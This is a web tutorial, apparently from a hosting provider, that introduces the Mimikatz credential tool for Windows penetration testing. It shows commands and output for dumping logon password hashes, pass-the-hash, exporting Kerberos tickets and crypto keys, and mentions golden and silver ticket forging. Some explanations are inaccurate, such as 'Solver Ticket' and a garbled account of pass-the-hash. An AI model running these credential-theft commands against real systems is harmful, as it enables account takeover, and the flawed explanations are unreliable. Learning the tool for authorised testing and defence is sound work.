What is Mimikatz?
Mimikatz is a tool created by the French developer, Benjamin Delpy used to gather credentials and can carry out a range of operations connected with penetration testing. Its creation stems from a noted vulnerability of the Windows system function called WDigest. WDigest is designed to allow larger Windows-based network users to establish credentials in multiple applications on a LAN or WAN. This feature stores authentication credentials in memory and allows for their automatic reuse so users only have to enter their login details once.
As it turned out, he had created one of the most powerful tools for detecting weaknesses in the security of the Windows system. Currently, pen testers still use Mimikatz as an adjunct along with other utilities for testing Windows security.
Here are five attack vectors that Mimikatz checks for.
- Pass-the-hash — NTLM, (or Windows NT LAN Manager) contains hashes which is used to obtain passwords. This system attempts to let end users utilize passwords multiple times without having to reuse the same hash again.
- Pass-the-Ticket — The Kerberos system is a network authentication protocol that that works based on tickets which allow nodes communicating over a non-secure network to verify their identity to one another securely. Mimikatz can obtain these tickets from the account of a user and uses them to access the system as this user.
- Kerberos Golden Ticket — This gets a ticket for the hidden key Distribution Center Service Account (KRBTGT), which encrypts all authenticity tickets, which provides access to the administrative level domain for any computer in the network.
- Kerberos Solver Ticket — This Windows functionality provides users with a ticket that access several services within a network. This lets a possible attacker impersonate a network user.
- Pass the key — This gets a unique key, which is used for authentication on a domain controller. An attacker can then use this key multiple times to impersonate a user.
Many companies still find this tool useful to detect and correct any weaknesses in their Local Security Authority Subsystem Service security.
First, we will need to open a Windows (or powershell) terminal. To accomplish this, press Win+X and then enter cmd.
Next step would be the installation of Mimikatz. It can be downloaded from GitHub by opening the following link (https://github.com/gentilkiwi/mimikatz/releases). Save it in .zip or .7z format, then unpack the archive and, depending on your system, choose x32 or x64 version. After that, run the file with the ‘.exe’ format. Mimikatz can be also downloaded from the source code and built on your own.
Microsoft Windows [Version 10.0.19041.329] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\Katherine>cd Downloads C:\Users\Katherine\Downloads>cd mimikatz_trunk C:\Users\Katherine\Downloads\mimikatz_trunk>cd x64 C:\Users\Katherine\Downloads\mimikatz_trunk\x64> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY gentilkiwi ( email@example.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( firstname.lastname@example.org ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz #
Let’s check whether Mimikatz works with the command ‘version’:
mimikatz # version mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 19041 (arch x64) msvc 150030729 207 mimikatz #
There exists a wide range of modules for varying purposes, but we are going to only review a few of the most popular ones.
Module Standard — it contains short and simple commands which can be used while working with this tool. Let’s take a look at some standard commands:
- exit — quits the program;
- cls — clears console;
- sleep — switches to sleep mode within several seconds:
mimikatz # sleep 4200 Sleep : 4200 ms... End ! mimikatz #
- answer – developers also like to have fun so this command prints answers to the most important questions in life!
- cd – changes or shows the current directory;
- log – used for journaling actions and recording logs:
mimikatz # log Using 'mimikatz.log' for logfile : OK mimikatz #
- coffee – when there’s no free minute to spare one can use this command to enjoy a short break with a virtual cup of coffee;
- base64 – switches to printing the output in the terminal instead of recording the files to the disk.
- Module Privilege – it contains some commands to work with privileges while working with Mimikatz.
Let’s put Mimikatz into the debugger mode to have more privileges and get a higher access level:
mimikatz # privilege::debug Privilege '20' OK mimikatz #
Module Crypto – this module can be used with CryptoAPI functions.
Providers – this command gets all providers if they are available:
mimikatz # crypto::providers CryptoAPI providers : 0. RSA_FULL ( 1) - Microsoft Base Cryptographic Provider v1.0 1. DSS_DH (13) - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider 2. DSS ( 3) - Microsoft Base DSS Cryptographic Provider 3. RSA_FULL ( 1) H - Microsoft Base Smart Card Crypto Provider 4. DH_SCHANNEL (18) - Microsoft DH SChannel Cryptographic Provider 5. RSA_FULL ( 1) - Microsoft Enhanced Cryptographic Provider v1.0 6. DSS_DH (13) - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider 7. RSA_AES (24) - Microsoft Enhanced RSA and AES Cryptographic Provider 8. RSA_SCHANNEL (12) - Microsoft RSA SChannel Cryptographic Provider 9. RSA_FULL ( 1) - Microsoft Strong Cryptographic Provider CryptoAPI provider types: 0. RSA_FULL ( 1) - RSA Full (Signature and Key Exchange) 1. DSS ( 3) - DSS Signature 2. RSA_SCHANNEL (12) - RSA SChannel 3. DSS_DH (13) - DSS Signature with Diffie-Hellman Key Exchange 4. DH_SCHANNEL (18) - Diffie-Hellman SChannel 5. RSA_AES (24) - RSA Full and AES CNG providers : 0. Microsoft Key Protection Provider 1. Microsoft Passport Key Storage Provider 2. Microsoft Platform Crypto Provider 3. Microsoft Primitive Provider 4. Microsoft Smart Card Key Storage Provider 5. Microsoft Software Key Storage Provider 6. Microsoft SSL Protocol Provider 7. Windows Client Key Protection Provider mimikatz #
keys – prints the lists of all providers’ keys (e.g. it can export the keys to terminal):
mimikatz # crypto::keys /export * Store : 'user' * Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0') * Provider type : 'PROV_RSA_FULL' (1) * CNG Provider : 'Microsoft Software Key Storage Provider' CryptoAPI keys : CNG keys : 0. Microsoft Connected Devices Platform device certificate |Provider name : Microsoft Software Key Storage Provider |Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ; Key Container : Microsoft Connected Devices Platform device certificate Unique name : de7cf8a7901d2ad13e5c67c29e5d1662_4446d1b2-0875-4cc5-bdeb-4835813c706d Algorithm : ECDSA_P256 Key size : 256 (0x00000100) Export policy : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; ) Exportable key : YES LSA isolation : NO Private export : OK - 'user_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k' mimikatz #
Module Sekurlsa – it can be used to extract passwords, keys, pin codes, tickets from memory. To work with this module command ‘privilege::debug‘ should be used. Starting from Windows 8.x and 10, the passwords are not in memory by default which increases security.
logonPasswords – used to get passwords from the memory:
mimikatz # sekurlsa::logonPasswords Authentication Id : 0 ; 143799 (00000000:000231b7) Session : Interactive from 1 UserName : Katherine Domain : HOME-PC Logon Server : HOME-PC Logon Time : 7/8/2020 12:00:02 PM SID : S-1-5-21-1137163267-1680361566-2184406797-1001 msv :  Primary * Username : Katherine * Domain : HOME-PC * NTLM : 19afbb31b09b2d5eb218675addf4e73c * SHA1 : e6770dc3e28e6755b49734a818ec7e17e69ef72f tspkg : wdigest : * Username : Katherine * Domain : HOME-PC * Password : (null) kerberos : * Username : Katherine * Domain : HOME-PC * Password : (null) ssp : credman : mimikatz #
To run the command line version as an Administrator, we use the following command.
mimikatz # sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd user : Administrateur domain : winxp program : cmd impers. : no NTLM : f193d757b4d487ab7e5a3743f038f713 | PID 3176 | TID 3188 | LSA Process was already R/W | LUID 0 ; 408781 (00000000:00063ccd) \_ msv1_0 - data copy @ 000001F73964A3C0 : OK ! \_ kerberos - data copy @ 000001F739ED3E78 \_ des_cbc_md4 -> null \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ des_cbc_md4 OK \_ *Password replace @ 000001F739681E78 (32) -> null mimikatz #
pth (Pass-The-Hash) — runs the process of changing the password with other accounts using the password change hash instead of the real password;
tickets /export — uses reading from Kerberos tickets memory and doesn’t have restrictions on exporting keys and other commands.
mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 129210 (00000000:0001f8ba) Session : Interactive from 1 UserName : Katherine Domain : HOME-PC Logon Server : HOME-PC Logon Time : 7/8/2020 12:47:21 PM SID : S-1-5-21-1137163267-1680361566-2184406797-1001 * Username : Katherine * Domain : HOME-PC * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 UserName : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 7/8/2020 12:47:13 PM SID : S-1-5-19 * Username : (null) * Domain : (null) * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket mimikatz #
Module Kerberos – it can work without any privileges and play around with official Microsoft Kerberos API. Kerberos tickets (e.g. golden and long-term ones) can be created for any users.
ptt – this command embeds Kerberos tickets into the current session;
golden / silver – this command creates Kerberos tickets with random data for any users, user groups which are required (e.g. Administrator);
tgt – it displays information about the current session:
mimikatz # kerberos::tgt Kerberos TGT of current session : no ticket ! mimikatz #
purge – performs a cleanup of all tickets and many other commands.
There are many commands and modules and to use them one should have the understanding of network structures and their use in Windows. This information can be found on the official web pages. A secure implementation of Kerberos in a group domain setting should avoid the kind of vulnerabilities discussed here.
In this article we reviewed Mimikatz, learned where and how it can be used, and detailed why it can be both useful and dangerous if used by a malicious individual. We have learned how to install it on Windows and noted some of its basic commands which can be used to determine sensitive information.
Should you decide to employ this utility to secure your Windows network, you will need to keep track of the latest Mimikatz updates and events to fully understand the methods and features used to gain access to the system information.
Our Support Teams are full of talented Linux technicians and System administrators who have an intimate knowledge of multiple web hosting technologies, especially those discussed in this article.
If you are a Fully Managed VPS server, Cloud Dedicated, VMWare Private Cloud, Private Parent server or a Dedicated server owner and you are uncomfortable with performing any of the steps outlined, we can be reached via phone @800.580.4985, a chat or support ticket to assisting you with this process.